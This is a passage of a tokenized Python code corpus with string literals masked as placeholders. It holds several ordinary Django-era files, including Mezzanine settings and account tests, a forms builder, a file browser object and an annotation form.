, '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' 
: '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:width>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import sys , os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> from django . conf import settings <EOL> if not settings . configured : <EOL> settings . configure ( <EOL> SMS_BACKEND = '<STR_LIT>' , <EOL> ) <EOL> extensions = [ '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] </s>
<s> import re <EOL> from django import forms <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from annotatetext . models import Annotation , ANNOTATION_FLAGS <EOL> class NewAnnotationForm ( forms . Form ) : <EOL> selection_start = forms . IntegerField ( required = True ) <EOL> selection_end = forms . IntegerField ( required = True ) <EOL> flags = forms . ChoiceField ( choices = enumerate ( ANNOTATION_FLAGS ) , widget = forms . Select ( attrs = { "<STR_LIT:class>" : "<STR_LIT>" } ) , required = True ) <EOL> content_type = forms . IntegerField ( widget = forms . HiddenInput , required = True ) <EOL> object_id = forms . IntegerField ( widget = forms . HiddenInput , required = True ) <EOL> comment = forms . CharField ( widget = forms . Textarea ( attrs = { '<STR_LIT>' : <NUM_LIT:50> , '<STR_LIT>' : <NUM_LIT:3> } ) , required = False ) <EOL> color = forms . CharField ( initial = "<STR_LIT>" , widget = forms . TextInput ( attrs = { "<STR_LIT:size>" : <NUM_LIT:6> } ) , required = False ) <EOL> lengthcheck = forms . IntegerField ( widget = forms . HiddenInput , required = True ) <EOL> def clean_color ( self ) : <EOL> data = self . cleaned_data [ "<STR_LIT>" ] <EOL> data = data . lower ( ) <EOL> if re . match ( "<STR_LIT>" , data ) is None : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> return data <EOL> def clean_flags ( self ) : <EOL> flags = self . cleaned_data [ "<STR_LIT>" ] <EOL> flags = int ( flags ) <EOL> if not flags in range ( len ( ANNOTATION_FLAGS ) ) : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> return flags <EOL> def clean ( self ) : <EOL> cleaned_data = self . cleaned_data <EOL> content_type_id = cleaned_data . get ( "<STR_LIT>" , None ) <EOL> object_id = cleaned_data . get ( "<STR_LIT>" , None ) <EOL> if content_type_id is None or object_id is None : <EOL> raise forms . 
ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> try : <EOL> ct = ContentType . objects . get ( id = content_type_id ) <EOL> except ContentType . DoesNotExist : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> try : <EOL> obj = ct . get_object_for_this_type ( id = object_id ) <EOL> except ct . model_class ( ) . DoesNotExist : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> cleaned_data [ "<STR_LIT>" ] = ct <EOL> if not getattr ( obj , "<STR_LIT>" , False ) : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> if not hasattr ( obj , Annotation . field_name ) : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> text = getattr ( obj , Annotation . field_name ) <EOL> if len ( text ) != cleaned_data [ "<STR_LIT>" ] : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> if not "<STR_LIT>" in cleaned_data or not "<STR_LIT>" in cleaned_data : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> if not Annotation . validate_selection ( text , start = cleaned_data [ "<STR_LIT>" ] , end = cleaned_data [ "<STR_LIT>" ] ) : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> if "<STR_LIT>" not in cleaned_data or "<STR_LIT>" not in cleaned_data : <EOL> raise forms . ValidationError ( _ ( "<STR_LIT>" ) ) <EOL> return cleaned_data </s>
<s> from inspect import getargspec <EOL> from pyws . functions . args import DictOf , TypeFactory <EOL> from pyws . utils import cached_property <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> CONTEXT_ARG_NAME = '<STR_LIT>' <EOL> class Function ( object ) : <EOL> """<STR_LIT>""" <EOL> name = None <EOL> documentation = None <EOL> return_type = None <EOL> args = None <EOL> needs_context = False <EOL> def __call__ ( self , context , ** args ) : <EOL> """<STR_LIT>""" <EOL> args = self . validate ( args ) <EOL> if self . needs_context : <EOL> if isinstance ( context , Exception ) : <EOL> raise context <EOL> args [ CONTEXT_ARG_NAME ] = context <EOL> return self . call ( ** args ) <EOL> @ cached_property <EOL> def type_name ( self ) : <EOL> return self . name <EOL> @ cached_property <EOL> def wrapped_return_type ( self ) : <EOL> return args . DictOf ( <EOL> self . type_name + '<STR_LIT>' , args . Field ( '<STR_LIT:result>' , self . return_type ) ) <EOL> def validate ( self , args ) : <EOL> return self . args . validate ( args ) <EOL> def call ( self , ** args ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class NativeFunctionAdapter ( Function ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , origin , <EOL> name = None , return_type = str , args = None , needs_context = False ) : <EOL> """<STR_LIT>""" <EOL> self . origin = origin <EOL> self . name = name or origin . __name__ <EOL> self . documentation = origin . __doc__ <EOL> self . return_type = TypeFactory ( return_type or str ) <EOL> self . needs_context = needs_context <EOL> arg_names = [ ( x , ) for x in getargspec ( origin ) [ <NUM_LIT:0> ] <EOL> if not needs_context or x != CONTEXT_ARG_NAME ] <EOL> if not args : <EOL> args = ( str , ) * len ( arg_names ) <EOL> args_ = map ( lambda x : x [ <NUM_LIT:0> ] + x [ <NUM_LIT:1> ] , zip ( arg_names , <EOL> map ( lambda arg : isinstance ( arg , tuple ) and arg or ( arg , ) , args ) ) ) <EOL> self . args = DictOf ( self . 
type_name , * args_ ) <EOL> def call ( self , ** args ) : <EOL> """<STR_LIT>""" <EOL> return self . origin ( ** args ) </s>
<s> from factory import build_client <EOL> class BaseTestCaseMixin ( object ) : <EOL> def setUp ( self ) : <EOL> client = build_client ( ) <EOL> self . client = client <EOL> self . service = client . service <EOL> self . factory = client . factory </s>
<s> from __future__ import unicode_literals <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django import forms <EOL> from django . forms . extras import SelectDateWidget <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from forms_builder . forms . settings import USE_HTML5 , EXTRA_FIELDS , EXTRA_WIDGETS <EOL> from forms_builder . forms . utils import html5_field , import_attr <EOL> TEXT = <NUM_LIT:1> <EOL> TEXTAREA = <NUM_LIT:2> <EOL> EMAIL = <NUM_LIT:3> <EOL> CHECKBOX = <NUM_LIT:4> <EOL> CHECKBOX_MULTIPLE = <NUM_LIT:5> <EOL> SELECT = <NUM_LIT:6> <EOL> SELECT_MULTIPLE = <NUM_LIT:7> <EOL> RADIO_MULTIPLE = <NUM_LIT:8> <EOL> FILE = <NUM_LIT:9> <EOL> DATE = <NUM_LIT:10> <EOL> DATE_TIME = <NUM_LIT:11> <EOL> HIDDEN = <NUM_LIT:12> <EOL> NUMBER = <NUM_LIT> <EOL> URL = <NUM_LIT> <EOL> DOB = <NUM_LIT:15> <EOL> NAMES = ( <EOL> ( TEXT , _ ( "<STR_LIT>" ) ) , <EOL> ( TEXTAREA , _ ( "<STR_LIT>" ) ) , <EOL> ( EMAIL , _ ( "<STR_LIT>" ) ) , <EOL> ( NUMBER , _ ( "<STR_LIT>" ) ) , <EOL> ( URL , _ ( "<STR_LIT>" ) ) , <EOL> ( CHECKBOX , _ ( "<STR_LIT>" ) ) , <EOL> ( CHECKBOX_MULTIPLE , _ ( "<STR_LIT>" ) ) , <EOL> ( SELECT , _ ( "<STR_LIT>" ) ) , <EOL> ( SELECT_MULTIPLE , _ ( "<STR_LIT>" ) ) , <EOL> ( RADIO_MULTIPLE , _ ( "<STR_LIT>" ) ) , <EOL> ( FILE , _ ( "<STR_LIT>" ) ) , <EOL> ( DATE , _ ( "<STR_LIT>" ) ) , <EOL> ( DATE_TIME , _ ( "<STR_LIT>" ) ) , <EOL> ( DOB , _ ( "<STR_LIT>" ) ) , <EOL> ( HIDDEN , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> CLASSES = { <EOL> TEXT : forms . CharField , <EOL> TEXTAREA : forms . CharField , <EOL> EMAIL : forms . EmailField , <EOL> CHECKBOX : forms . BooleanField , <EOL> CHECKBOX_MULTIPLE : forms . MultipleChoiceField , <EOL> SELECT : forms . ChoiceField , <EOL> SELECT_MULTIPLE : forms . MultipleChoiceField , <EOL> RADIO_MULTIPLE : forms . ChoiceField , <EOL> FILE : forms . FileField , <EOL> DATE : forms . DateField , <EOL> DATE_TIME : forms . DateTimeField , <EOL> DOB : forms . 
DateField , <EOL> HIDDEN : forms . CharField , <EOL> NUMBER : forms . FloatField , <EOL> URL : forms . URLField , <EOL> } <EOL> WIDGETS = { <EOL> TEXTAREA : forms . Textarea , <EOL> CHECKBOX_MULTIPLE : forms . CheckboxSelectMultiple , <EOL> RADIO_MULTIPLE : forms . RadioSelect , <EOL> DATE : SelectDateWidget , <EOL> DOB : SelectDateWidget , <EOL> HIDDEN : forms . HiddenInput , <EOL> } <EOL> CHOICES = ( CHECKBOX , SELECT , RADIO_MULTIPLE ) <EOL> DATES = ( DATE , DATE_TIME , DOB ) <EOL> MULTIPLE = ( CHECKBOX_MULTIPLE , SELECT_MULTIPLE ) <EOL> if USE_HTML5 : <EOL> WIDGETS . update ( { <EOL> DATE : html5_field ( "<STR_LIT:date>" , forms . DateInput ) , <EOL> DATE_TIME : html5_field ( "<STR_LIT>" , forms . DateTimeInput ) , <EOL> DOB : html5_field ( "<STR_LIT:date>" , forms . DateInput ) , <EOL> EMAIL : html5_field ( "<STR_LIT:email>" , forms . TextInput ) , <EOL> NUMBER : html5_field ( "<STR_LIT>" , forms . TextInput ) , <EOL> URL : html5_field ( "<STR_LIT:url>" , forms . TextInput ) , <EOL> } ) <EOL> for field_id , field_path , field_name in EXTRA_FIELDS : <EOL> if field_id in CLASSES : <EOL> err = "<STR_LIT>" <EOL> raise ImproperlyConfigured ( err % ( field_id , field_name ) ) <EOL> CLASSES [ field_id ] = import_attr ( field_path ) <EOL> NAMES += ( ( field_id , _ ( field_name ) ) , ) <EOL> for field_id , widget_path in EXTRA_WIDGETS : <EOL> if field_id not in CLASSES : <EOL> err = "<STR_LIT>" <EOL> raise ImproperlyConfigured ( err % field_id ) <EOL> WIDGETS [ field_id ] = import_attr ( widget_path ) </s>
<s> from __future__ import unicode_literals <EOL> import os <EOL> import datetime <EOL> import time <EOL> import mimetypes <EOL> from django . core . files . storage import default_storage <EOL> from django . utils . encoding import smart_str <EOL> try : <EOL> from django . utils . encoding import smart_text <EOL> except ImportError : <EOL> from django . utils . encoding import smart_unicode as smart_text <EOL> from filebrowser_safe . settings import * <EOL> from filebrowser_safe . functions import get_file_type , path_strip , get_directory <EOL> class FileObject ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> self . head = os . path . dirname ( path ) <EOL> self . filename = os . path . basename ( path ) <EOL> self . filename_lower = self . filename . lower ( ) <EOL> self . filename_root , self . extension = os . path . splitext ( self . filename ) <EOL> self . mimetype = mimetypes . guess_type ( self . filename ) <EOL> def __str__ ( self ) : <EOL> return smart_str ( self . path ) <EOL> def __unicode__ ( self ) : <EOL> return smart_text ( self . path ) <EOL> @ property <EOL> def name ( self ) : <EOL> return self . path <EOL> def __repr__ ( self ) : <EOL> return smart_str ( "<STR_LIT>" % ( self . __class__ . __name__ , self or "<STR_LIT:None>" ) ) <EOL> def __len__ ( self ) : <EOL> return len ( self . path ) <EOL> _filetype_stored = None <EOL> def _filetype ( self ) : <EOL> if self . _filetype_stored != None : <EOL> return self . _filetype_stored <EOL> if self . is_folder : <EOL> self . _filetype_stored = '<STR_LIT>' <EOL> else : <EOL> self . _filetype_stored = get_file_type ( self . filename ) <EOL> return self . _filetype_stored <EOL> filetype = property ( _filetype ) <EOL> _filesize_stored = None <EOL> def _filesize ( self ) : <EOL> if self . _filesize_stored != None : <EOL> return self . _filesize_stored <EOL> if self . exists ( ) : <EOL> self . _filesize_stored = default_storage . size ( self . 
path ) <EOL> return self . _filesize_stored <EOL> return None <EOL> filesize = property ( _filesize ) <EOL> _date_stored = None <EOL> def _date ( self ) : <EOL> if self . _date_stored != None : <EOL> return self . _date_stored <EOL> if self . exists ( ) : <EOL> self . _date_stored = time . mktime ( default_storage . modified_time ( self . path ) . timetuple ( ) ) <EOL> return self . _date_stored <EOL> return None <EOL> date = property ( _date ) <EOL> def _datetime ( self ) : <EOL> if self . date : <EOL> return datetime . datetime . fromtimestamp ( self . date ) <EOL> return None <EOL> datetime = property ( _datetime ) <EOL> _exists_stored = None <EOL> def exists ( self ) : <EOL> if self . _exists_stored == None : <EOL> self . _exists_stored = default_storage . exists ( self . path ) <EOL> return self . _exists_stored <EOL> def _path_relative_directory ( self ) : <EOL> "<STR_LIT>" <EOL> return path_strip ( self . path , get_directory ( ) ) . lstrip ( "<STR_LIT:/>" ) <EOL> path_relative_directory = property ( _path_relative_directory ) <EOL> def _url ( self ) : <EOL> return default_storage . url ( self . path ) <EOL> url = property ( _url ) <EOL> def _directory ( self ) : <EOL> return path_strip ( self . path , get_directory ( ) ) <EOL> directory = property ( _directory ) <EOL> def _folder ( self ) : <EOL> return os . path . dirname ( path_strip ( os . path . join ( self . head , '<STR_LIT>' ) , get_directory ( ) ) ) <EOL> folder = property ( _folder ) <EOL> _is_folder_stored = None <EOL> def _is_folder ( self ) : <EOL> if self . _is_folder_stored == None : <EOL> self . _is_folder_stored = default_storage . isdir ( self . path ) <EOL> return self . _is_folder_stored <EOL> is_folder = property ( _is_folder ) <EOL> def _is_empty ( self ) : <EOL> if self . is_folder : <EOL> try : <EOL> dirs , files = default_storage . listdir ( self . path ) <EOL> except UnicodeDecodeError : <EOL> from mezzanine . core . 
exceptions import FileSystemEncodingChanged <EOL> raise FileSystemEncodingChanged ( ) <EOL> if not dirs and not files : <EOL> return True <EOL> return False <EOL> is_empty = property ( _is_empty ) <EOL> def delete ( self ) : <EOL> if self . is_folder : <EOL> default_storage . rmtree ( self . path ) <EOL> else : <EOL> default_storage . delete ( self . path ) <EOL> def delete_versions ( self ) : <EOL> for version in self . versions ( ) : <EOL> try : <EOL> default_storage . delete ( version ) <EOL> except : <EOL> pass <EOL> def delete_admin_versions ( self ) : <EOL> for version in self . admin_versions ( ) : <EOL> try : <EOL> default_storage . delete ( version ) <EOL> except : <EOL> pass </s>
<s> from django . core . management import call_command <EOL> from gevent import spawn <EOL> from gnotty . management . commands import gnottify <EOL> class Command ( gnottify . Command ) : <EOL> def handle ( self , * args , ** options ) : <EOL> spawn ( lambda : call_command ( "<STR_LIT>" , * args ) ) <EOL> super ( Command , self ) . handle ( * args , ** options ) </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . auth . tokens import default_token_generator <EOL> from django . core import mail <EOL> from django . core . urlresolvers import reverse <EOL> from django . forms . fields import DateField , DateTimeField <EOL> from django . utils . http import int_to_base36 <EOL> from mezzanine . accounts import ProfileNotConfigured <EOL> from mezzanine . accounts . forms import ProfileForm <EOL> from mezzanine . conf import settings <EOL> from mezzanine . utils . tests import TestCase <EOL> User = get_user_model ( ) <EOL> class AccountsTests ( TestCase ) : <EOL> def account_data ( self , test_value ) : <EOL> """<STR_LIT>""" <EOL> data = { "<STR_LIT:email>" : test_value + "<STR_LIT>" } <EOL> for field in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:username>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) : <EOL> if field . startswith ( "<STR_LIT:password>" ) : <EOL> value = "<STR_LIT:x>" * settings . ACCOUNTS_MIN_PASSWORD_LENGTH <EOL> else : <EOL> value = test_value <EOL> data [ field ] = value <EOL> try : <EOL> profile_form = ProfileForm ( ) <EOL> ProfileFieldsForm = profile_form . get_profile_fields_form ( ) <EOL> for name , field in ProfileFieldsForm ( ) . fields . items ( ) : <EOL> if name != "<STR_LIT:id>" : <EOL> if hasattr ( field , "<STR_LIT>" ) : <EOL> value = list ( field . choices ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> elif isinstance ( field , ( DateField , DateTimeField ) ) : <EOL> value = "<STR_LIT>" <EOL> else : <EOL> value = test_value <EOL> data [ name ] = value <EOL> except ProfileNotConfigured : <EOL> pass <EOL> return data <EOL> def test_account ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . account_data ( "<STR_LIT>" ) <EOL> settings . ACCOUNTS_VERIFICATION_REQUIRED = False <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , data , follow = True ) <EOL> self . assertEqual ( response . 
status_code , <NUM_LIT:200> ) <EOL> users = User . objects . filter ( email = data [ "<STR_LIT:email>" ] , is_active = True ) <EOL> self . assertEqual ( len ( users ) , <NUM_LIT:1> ) <EOL> settings . ACCOUNTS_VERIFICATION_REQUIRED = True <EOL> data = self . account_data ( "<STR_LIT>" ) <EOL> emails = len ( mail . outbox ) <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , data , follow = True ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> users = User . objects . filter ( email = data [ "<STR_LIT:email>" ] , is_active = False ) <EOL> self . assertEqual ( len ( users ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( mail . outbox ) , emails + <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( mail . outbox [ <NUM_LIT:0> ] . to ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( mail . outbox [ <NUM_LIT:0> ] . to [ <NUM_LIT:0> ] , data [ "<STR_LIT:email>" ] ) <EOL> new_user = users [ <NUM_LIT:0> ] <EOL> verification_url = reverse ( "<STR_LIT>" , kwargs = { <EOL> "<STR_LIT>" : int_to_base36 ( new_user . id ) , <EOL> "<STR_LIT>" : default_token_generator . make_token ( new_user ) , <EOL> } ) <EOL> response = self . client . get ( verification_url , follow = True ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> users = User . objects . filter ( email = data [ "<STR_LIT:email>" ] , is_active = True ) <EOL> self . assertEqual ( len ( users ) , <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from weakref import WeakKeyDictionary <EOL> from future . builtins import bytes , str <EOL> from functools import partial <EOL> from importlib import import_module <EOL> from warnings import warn <EOL> from django . conf import settings as django_settings <EOL> from django . utils . functional import Promise <EOL> from django . utils . module_loading import module_has_submodule <EOL> from mezzanine import __version__ <EOL> from mezzanine . core . request import current_request <EOL> registry = { } <EOL> def register_setting ( name = None , label = None , editable = False , description = None , <EOL> default = None , choices = None , append = False , <EOL> translatable = False ) : <EOL> """<STR_LIT>""" <EOL> if name is None : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if editable and default is None : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if append and name in registry : <EOL> registry [ name ] [ "<STR_LIT:default>" ] += default <EOL> return <EOL> if hasattr ( django_settings , name ) : <EOL> editable = False <EOL> if label is None : <EOL> label = name . replace ( "<STR_LIT:_>" , "<STR_LIT:U+0020>" ) . 
title ( ) <EOL> if isinstance ( default , bool ) : <EOL> setting_type = bool <EOL> elif isinstance ( default , int ) : <EOL> setting_type = int <EOL> elif isinstance ( default , ( str , Promise ) ) : <EOL> setting_type = str <EOL> elif isinstance ( default , bytes ) : <EOL> setting_type = bytes <EOL> else : <EOL> setting_type = type ( default ) <EOL> registry [ name ] = { "<STR_LIT:name>" : name , "<STR_LIT:label>" : label , "<STR_LIT>" : editable , <EOL> "<STR_LIT:description>" : description , "<STR_LIT:default>" : default , <EOL> "<STR_LIT>" : choices , "<STR_LIT:type>" : setting_type , <EOL> "<STR_LIT>" : translatable } <EOL> class Settings ( object ) : <EOL> """<STR_LIT>""" <EOL> class Placeholder ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> NULL_REQUEST = Placeholder ( ) <EOL> TYPE_FUNCTIONS = { <EOL> bool : lambda val : val != "<STR_LIT:False>" , <EOL> bytes : partial ( bytes , encoding = '<STR_LIT:utf8>' ) <EOL> } <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _editable_caches = WeakKeyDictionary ( ) <EOL> @ property <EOL> def _current_request ( self ) : <EOL> return current_request ( ) or self . NULL_REQUEST <EOL> def use_editable ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clear_cache ( ) <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> DeprecationWarning , <EOL> stacklevel = <NUM_LIT:2> ) <EOL> def clear_cache ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _editable_caches . pop ( self . _current_request , None ) <EOL> def _get_editable ( self , request ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> editable_settings = self . _editable_caches [ request ] <EOL> except KeyError : <EOL> editable_settings = self . _editable_caches [ request ] = self . _load ( ) <EOL> return editable_settings <EOL> @ classmethod <EOL> def _to_python ( cls , setting , raw_value ) : <EOL> """<STR_LIT>""" <EOL> type_fn = cls . TYPE_FUNCTIONS . 
get ( setting [ "<STR_LIT:type>" ] , setting [ "<STR_LIT:type>" ] ) <EOL> try : <EOL> value = type_fn ( raw_value ) <EOL> except ValueError : <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( setting [ "<STR_LIT:name>" ] , setting [ "<STR_LIT:type>" ] . __name__ , <EOL> repr ( raw_value ) , repr ( setting [ "<STR_LIT:default>" ] ) ) ) <EOL> value = setting [ "<STR_LIT:default>" ] <EOL> return value <EOL> def _load ( self ) : <EOL> """<STR_LIT>""" <EOL> from mezzanine . conf . models import Setting <EOL> removed_settings = [ ] <EOL> conflicting_settings = [ ] <EOL> new_cache = { } <EOL> for setting_obj in Setting . objects . all ( ) : <EOL> try : <EOL> setting = registry [ setting_obj . name ] <EOL> except KeyError : <EOL> removed_settings . append ( setting_obj . name ) <EOL> continue <EOL> setting_value = self . _to_python ( setting , setting_obj . value ) <EOL> if hasattr ( django_settings , setting [ "<STR_LIT:name>" ] ) : <EOL> if setting_value != setting [ "<STR_LIT:default>" ] : <EOL> conflicting_settings . append ( setting_obj . name ) <EOL> continue <EOL> new_cache [ setting [ "<STR_LIT:name>" ] ] = setting_value <EOL> if removed_settings : <EOL> Setting . objects . filter ( name__in = removed_settings ) . delete ( ) <EOL> if conflicting_settings : <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % "<STR_LIT:U+002CU+0020>" . join ( conflicting_settings ) ) <EOL> return new_cache <EOL> def __getattr__ ( self , name ) : <EOL> try : <EOL> setting = registry [ name ] <EOL> except KeyError : <EOL> return getattr ( django_settings , name ) <EOL> if setting [ "<STR_LIT>" ] : <EOL> editable_cache = self . _get_editable ( request = self . _current_request ) <EOL> return getattr ( django_settings , name , <EOL> editable_cache . 
get ( name , setting [ "<STR_LIT:default>" ] ) ) <EOL> return getattr ( django_settings , name , setting [ "<STR_LIT:default>" ] ) <EOL> def __setattr__ ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> setattr ( django_settings , key , value ) <EOL> def __delattr__ ( self , item ) : <EOL> """<STR_LIT>""" <EOL> delattr ( django_settings , item ) <EOL> mezz_first = lambda app : not app . startswith ( "<STR_LIT>" ) <EOL> for app in sorted ( django_settings . INSTALLED_APPS , key = mezz_first ) : <EOL> try : <EOL> module = import_module ( app ) <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> try : <EOL> import_module ( "<STR_LIT>" % app ) <EOL> except : <EOL> if module_has_submodule ( module , "<STR_LIT>" ) : <EOL> raise <EOL> settings = Settings ( ) </s>
<s> from __future__ import absolute_import , division , unicode_literals <EOL> from future . builtins import int , open , str <EOL> from hashlib import md5 <EOL> import os <EOL> try : <EOL> from urllib . parse import quote , unquote <EOL> except ImportError : <EOL> from urllib import quote , unquote <EOL> from django . apps import apps <EOL> from django . contrib import admin <EOL> from django . contrib . auth import REDIRECT_FIELD_NAME <EOL> from django . contrib . sites . models import Site <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . core . files import File <EOL> from django . core . files . storage import default_storage <EOL> from django . core . urlresolvers import reverse , resolve , NoReverseMatch <EOL> from django . db . models import Model <EOL> from django . template import Context , Node , Template , TemplateSyntaxError <EOL> from django . template . base import ( TOKEN_BLOCK , TOKEN_COMMENT , <EOL> TOKEN_TEXT , TOKEN_VAR , TextNode ) <EOL> from django . template . defaultfilters import escape <EOL> from django . template . loader import get_template <EOL> from django . utils import translation <EOL> from django . utils . html import strip_tags <EOL> from django . utils . text import capfirst <EOL> from mezzanine . conf import settings <EOL> from mezzanine . core . fields import RichTextField <EOL> from mezzanine . core . forms import get_edit_form <EOL> from mezzanine . utils . cache import nevercache_token , cache_installed <EOL> from mezzanine . utils . html import decode_entities <EOL> from mezzanine . utils . importing import import_dotted_path <EOL> from mezzanine . utils . sites import current_site_id , has_site_permission <EOL> from mezzanine . utils . urls import admin_url <EOL> from mezzanine . utils . views import is_editable <EOL> from mezzanine import template <EOL> register = template . Library ( ) <EOL> if "<STR_LIT>" in settings . INSTALLED_APPS : <EOL> @ register . 
tag <EOL> def compress ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> from compressor . templatetags . compress import compress <EOL> return compress ( parser , token ) <EOL> else : <EOL> @ register . to_end_tag <EOL> def compress ( parsed , context , token ) : <EOL> """<STR_LIT>""" <EOL> return parsed <EOL> if cache_installed ( ) : <EOL> @ register . tag <EOL> def nevercache ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> text = [ ] <EOL> end_tag = "<STR_LIT>" <EOL> tag_mapping = { <EOL> TOKEN_TEXT : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> TOKEN_VAR : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> TOKEN_BLOCK : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> TOKEN_COMMENT : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> } <EOL> delimiter = nevercache_token ( ) <EOL> while parser . tokens : <EOL> token = parser . next_token ( ) <EOL> if token . token_type == TOKEN_BLOCK and token . contents == end_tag : <EOL> return TextNode ( delimiter + "<STR_LIT>" . join ( text ) + delimiter ) <EOL> start , end = tag_mapping [ token . token_type ] <EOL> text . append ( "<STR_LIT>" % ( start , token . contents , end ) ) <EOL> parser . unclosed_block_tag ( end_tag ) <EOL> else : <EOL> @ register . to_end_tag <EOL> def nevercache ( parsed , context , token ) : <EOL> """<STR_LIT>""" <EOL> return parsed <EOL> @ register . simple_tag ( takes_context = True ) 